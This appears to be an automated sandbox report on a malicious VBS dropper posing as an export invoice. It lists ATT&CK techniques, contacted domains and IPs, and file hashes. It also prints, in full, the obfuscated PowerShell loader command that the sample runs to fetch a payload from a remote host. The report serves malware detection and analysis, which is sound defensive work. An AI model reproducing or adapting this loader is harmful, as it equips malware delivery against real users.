              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#hogherd chimariko colonizabilities sternebra #>;$outdoorsy='familienavnets';<#durum startelementernes clangorously substantify starthullernes #>;$programmeringssprogets=$wane+$host.ui; function tollhouse($lao){if ($programmeringssprogets) {$abasements++;}$vaticinating=$aaremaalsstillingers48+$lao.'length'-$abasements; for( $nonlinear228=4;$nonlinear228 -lt $vaticinating;$nonlinear228+=5){$humanlike=$nonlinear228;$betting+=$lao[$nonlinear228];$erantissenes='chefassistenters';}$betting;}function profitmagere($shoetrees){ . ($forstbotanikker) ($shoetrees);}$skubbe=tollhouse 'forlmanagoslngzf reiprosl eeklgodvadjel/land ';$gangava=' bef[milincuare ddbt ige.gemashis,e pharmuldv ielievenc bi,e .ejp adolikiidensnrelotsnigmmenyainfrn s.iatemegbo reinkardodo]mads:nona: regsr,tueranucs nkufor ruddais nhtunavy k npo.dirdentomedltsve oredncstopode ol tro mini=be,p ';$skubbe+=tollhouse 'f,ib5 es.over0lukk pal.(op pw i filoxinpe sd arkomicrwvivisudes ,onngalltmoan tids1pre.0 tem.in,e0ll b;nost in ewstriisheencray6pr s4hel ;vand nitwxlini6 sk 4 ude; ev gerwennvukri:tryk1taco3yttr1cler.klde0up r)stor ogig useor.ac hokteguoluft/ kl 2afbi0opru1,hul0hydr0giav1soll0sign1l.ig rec fha.di polrslebebe ifr poobagaxaf e/toyl1euda3 ta.1.ran.ko.k0e bl ';$gangava+='sole[prognweeveufortquin.goneselskedialcintruaflnrferrivelotinteyde eppo wrholko statlineo skrcsurpoc,rolddmatmaliyeurypmonke pri]inbu ';$dendrochronologically=tollhouse 'bofoubr.es foregrovr egl- hvearesmg an.e ,lunla nt .nd ';$galvanism=tollhouse 'be,rhvejatconstes.hpt.rssgrun:fred/parm/ p idreklelithsrubie.nteualsirker iudsp-enear desooptimbiv.amelanb goib,viatils.,assrbestotraf/aro bwambe stonovern abnimeten r cgudnatoverogro.npara.umisj b.lpoverbafst ';$play=tollhouse ' org>dec, ';$forstbotanikker=tollhouse ' unligenoe locx gud ';$relais20='cruzieros';$gangava+='fora: por:unidtundilbrugsbril1la i2rm.u ';$resurgence='\ghastily.kri';profitmagere (tollhouse 'samm$w lfg lenlpustofluob h na klilvolt:ethebforea,urvlfa csrepraev.cmsectevandrtakeimadon ighgi teepre r psyna pee igg=ano,$ aceeforknstatvdokt:stata ommpfathphabednodaafangtspina cen+afve$pha r unrea.rispalaustr,r au.g us epat ns.cickogee e e ');profitmagere (tollhouse ' dei$.ilfg a.al irnositabfrenastemlinte:deflhoxidobesvrzimmm b oourannopgaesgne=halv$antig preas eellinivunmeaconsn meaibib,sfornmg,og.intestr gpstiglven.i rustarth(a.ti$skdyp isclretsaroseymini)an e ');profitmagere (tollhouse $gangava);$galvanism=$hormone[0];$flugtet=(tollhouse 'tall$retsgirreldepro pobinteaunsul sub:ulopbgen.o bligpa.agpu natidlr losts ak=fraanpulse,eltwmo.i- bomofjedb ankj f.oeafkrcv,detopgr v.ndsge,nysa issno tautoematrmno t. forn,eace atathaem.outiwanatedigrb regcenoplfi,gical e st no ertwund ');profitmagere ($flugtet);profitmagere (tollhouse ' po $ ,ubbruino,pelgs.ydgrh daa tir ieltvauq. mirhadvieha vana ad obeeindsr,alsslati[fled$c
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#hogherd chimariko colonizabilities sternebra #>;$outdoorsy='familienavnets';<#durum startelementernes clangorously substantify starthullernes #>;$programmeringssprogets=$wane+$host.ui; function tollhouse($lao){if ($programmeringssprogets) {$abasements++;}$vaticinating=$aaremaalsstillingers48+$lao.'length'-$abasements; for( $nonlinear228=4;$nonlinear228 -lt $vaticinating;$nonlinear228+=5){$humanlike=$nonlinear228;$betting+=$lao[$nonlinear228];$erantissenes='chefassistenters';}$betting;}function profitmagere($shoetrees){ . ($forstbotanikker) ($shoetrees);}$skubbe=tollhouse 'forlmanagoslngzf reiprosl eeklgodvadjel/land ';$gangava=' bef[milincuare ddbt ige.gemashis,e pharmuldv ielievenc bi,e .ejp adolikiidensnrelotsnigmmenyainfrn s.iatemegbo reinkardodo]mads:nona: regsr,tueranucs nkufor ruddais nhtunavy k npo.dirdentomedltsve oredncstopode ol tro mini=be,p ';$skubbe+=tollhouse 'f,ib5 es.over0lukk pal.(op pw i filoxinpe sd arkomicrwvivisudes ,onngalltmoan tids1pre.0 tem.in,e0ll b;nost in ewstriisheencray6pr s4hel ;vand nitwxlini6 sk 4 ude; ev gerwennvukri:tryk1taco3yttr1cler.klde0up r)stor ogig useor.ac hokteguoluft/ kl 2afbi0opru1,hul0hydr0giav1soll0sign1l.ig rec fha.di polrslebebe ifr poobagaxaf e/toyl1euda3 ta.1.ran.ko.k0e bl ';$gangava+='sole[prognweeveufortquin.goneselskedialcintruaflnrferrivelotinteyde eppo wrholko statlineo skrcsurpoc,rolddmatmaliyeurypmonke pri]inbu ';$dendrochronologically=tollhouse 'bofoubr.es foregrovr egl- hvearesmg an.e ,lunla nt .nd ';$galvanism=tollhouse 'be,rhvejatconstes.hpt.rssgrun:fred/parm/ p idreklelithsrubie.nteualsirker iudsp-enear desooptimbiv.amelanb goib,viatils.,assrbestotraf/aro bwambe stonovern abnimeten r cgudnatoverogro.npara.umisj b.lpoverbafst ';$play=tollhouse ' org>dec, ';$forstbotanikker=tollhouse ' unligenoe locx gud ';$relais20='cruzieros';$gangava+='fora: por:unidtundilbrugsbril1la i2rm.u ';$resurgence='\ghastily.kri';profitmagere (tollhouse 'samm$w lfg lenlpustofluob h na klilvolt:ethebforea,urvlfa csrepraev.cmsectevandrtakeimadon ighgi teepre r psyna pee igg=ano,$ aceeforknstatvdokt:stata ommpfathphabednodaafangtspina cen+afve$pha r unrea.rispalaustr,r au.g us epat ns.cickogee e e ');profitmagere (tollhouse ' dei$.ilfg a.al irnositabfrenastemlinte:deflhoxidobesvrzimmm b oourannopgaesgne=halv$antig preas eellinivunmeaconsn meaibib,sfornmg,og.intestr gpstiglven.i rustarth(a.ti$skdyp isclretsaroseymini)an e ');profitmagere (tollhouse $gangava);$galvanism=$hormone[0];$flugtet=(tollhouse 'tall$retsgirreldepro pobinteaunsul sub:ulopbgen.o bligpa.agpu natidlr losts ak=fraanpulse,eltwmo.i- bomofjedb ankj f.oeafkrcv,detopgr v.ndsge,nysa issno tautoematrmno t. forn,eace atathaem.outiwanatedigrb regcenoplfi,gical e st no ertwund ');profitmagere ($flugtet);profitmagere (tollhouse ' po $ ,ubbruino,pelgs.ydgrh daa tir ieltvauq. mirhadvieha vana ad obeeindsr,alsslati[fled$cJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote ServicesData from Local System1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0017.t-0009.fb-t-msedge.net
              		13.107.253.45
              		truefalse
                		unknown
                deseuri-romania.ro
                		188.241.183.203
                		truefalse
                  		unknown
                  Horm5zl_6637.6637.6637.657e
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://deseuri-romania.ro/Bennington.jpbfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://deseuri-romania.ropowershell.exe, 00000004.00000002.1484608451.000002D2D2D92000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore6lB_qpowershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://deseuri-romania.ro/Bennington.jpbXR0lpowershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://go.micropowershell.exe, 00000004.00000002.1484608451.000002D2D21BE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://deseuri-romania.ropowershell.exe, 00000004.00000002.1484608451.000002D2D2A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://deseuri-romania.ro/Bennington.jpbPpowershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://aka.ms/pscore68powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    188.241.183.203
                                    		deseuri-romania.roRomania
                                    		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1541193
                                    Start date and time:2024-10-24 15:06:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 28s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winVBS@9/7@2/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 74%
                                    • Number of executed functions: 44
                                    • Number of non-executed functions: 21
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7608 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7852 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:07:08API Interceptor88x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    s-part-0017.t-0009.fb-t-msedge.nethttps://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/Get hashmaliciousUnknownBrowse
                                    • 13.107.253.45
                                    From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zipGet hashmaliciousXmrigBrowse
                                    • 13.107.253.45
                                    https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUnGet hashmaliciousHtmlDropperBrowse
                                    • 13.107.253.45
                                    https://railrent-railrent.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                    • 13.107.253.45
                                    https://2007.filemail.com/api/file/get?filekey=58mKUrTMdlmzqkRvo0UdVa2TMjJTCQiSNv5rUBtsDQTNU0dM4JzppUJaOrP_mWxCym0k9l5xEDeaXunPsHq6frY8XZH_gnclw86MefA3bpAlGuDkr77-xSqrMOQIlMdW5cRjwoOSCWIlTwpC48cNKMMHhMKp&track=P8fpm4ry&pk_vid=8a8b18f03738ae4f17297703684d559dGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.253.45
                                    attachment(1).emlGet hashmaliciousUnknownBrowse
                                    • 13.107.253.45
                                    PO 635614 635613_CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.253.45
                                    https://railrent-railrent.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                    • 13.107.253.45
                                    1863415243647.exeGet hashmaliciousAgentTeslaBrowse
                                    • 13.107.253.45
                                    SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                    • 13.107.253.45

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    GTSCEGTSCentralEuropeAntelGermanyCZatH4SE3Oi6.elfGet hashmaliciousMiraiBrowse
                                    • 94.42.225.27
                                    o2YUBeMZW6.elfGet hashmaliciousMiraiBrowse
                                    • 62.168.37.157
                                    5tSAlF2WkT.elfGet hashmaliciousMiraiBrowse
                                    • 62.168.37.162
                                    ai3eCONS9Q.elfGet hashmaliciousMiraiBrowse
                                    • 94.42.250.26
                                    arm4.elfGet hashmaliciousMiraiBrowse
                                    • 157.25.81.90
                                    byte.arm5.elfGet hashmaliciousOkiruBrowse
                                    • 212.38.198.222
                                    O1CZjzItH1.vbsGet hashmaliciousGuLoaderBrowse
                                    • 31.14.12.249
                                    Stima IMP87654 per l'esportazione dell'ultimo trimestre.vbsGet hashmaliciousGuLoaderBrowse
                                    • 188.241.183.45
                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                    • 193.85.134.61
                                    M3Llib2vh3.elfGet hashmaliciousMiraiBrowse
                                    • 62.168.37.191

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0ekQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                    • 188.241.183.203
                                    PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                    • 188.241.183.203
                                    https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
                                    • 188.241.183.203
                                    Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 188.241.183.203
                                    xVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                    • 188.241.183.203
                                    226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 188.241.183.203
                                    LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                    • 188.241.183.203
                                    Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                    • 188.241.183.203
                                    xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                    • 188.241.183.203
                                    4aOgNkVU5z.exeGet hashmaliciousUnknownBrowse
                                    • 188.241.183.203

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllultnxj:NllU
                                    MD5:F93358E626551B46E6ED5A0A9D29BD51
                                    SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                    SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
